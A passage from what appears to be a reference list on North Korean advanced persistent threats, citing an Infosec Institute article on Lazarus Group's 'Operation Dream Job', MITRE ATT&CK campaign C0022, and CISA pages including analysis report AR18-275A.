[https://www.infosecinstitute.com/resources/malware-analysis/what-is-operation-dream-job-by-lazarus/](https://www.infosecinstitute.com/resources/malware-analysis/what-is-operation-dream-job-by-lazarus/) **Advanced Persistent Threats - North Korea** - MITRE. "Campaign C0022." Retrieved from [https://attack.mitre.org/campaigns/C0022/](https://attack.mitre.org/campaigns/C0022/) - CISA. "Advanced Persistent Threats - North Korea." Retrieved from [https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/north-korea](https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/north-korea) - CISA. "Analysis Reports AR18-275A." Retrieved from [https://www.cisa.gov/news-events/analysis-reports/ar18-275a](https://www.cisa.gov/news-events/analysis-reports/ar18-275a)